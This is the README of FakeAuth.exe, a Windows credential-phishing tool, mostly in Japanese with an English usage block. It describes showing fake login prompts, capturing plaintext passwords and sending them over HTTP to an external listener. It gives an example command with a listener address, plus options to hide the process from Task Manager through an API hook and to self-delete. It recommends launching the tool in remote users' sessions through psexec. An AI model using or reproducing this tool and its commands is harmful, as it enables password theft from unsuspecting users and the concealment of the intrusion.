
偽の認証プロンプトを作成し、ユーザーの平文パスワードをキャプチャします。
FakeAuthは、ユーザーの認証情報を入力要求し、HTTPプロトコルで外部に送信するツールです。
以下のプロジェクトに触発されました
汚いコードとバグがあるかもしれません ;)
特別な要件はありません
Usage: FakeAuth.exe <hide> <mode> <type> <count> <title> <message> <listener>
Example: FakeAuth.exe 1 1 1 10 window_title enter_creds 10.0.0.0:80\n
hide (integer) -> Hide Process in Taskmgr by WinAPI-Hook (0,1 - requires FakeAuth.dll)
mode (integer) -> Self-Delete at process stop (0,1) - .dll only possible if taskmgr closed!
type (integer) -> Prompt Style (1,2)
count (long) -> How many prompts after invalid Credentials (0,1,2,..,n 0=unlimited)
title (string) -> Prompt title (visible in type=1 only)
message (string) -> Window message
listener (string) -> HTTP exfiltration listener (10.0.0.0:80), if not specified print stdout
最も良い使用方法は、リモートマシンのユーザーセッションで起動することです(psexecなどのヘルパーを使用)
@atn1ght1 Twitter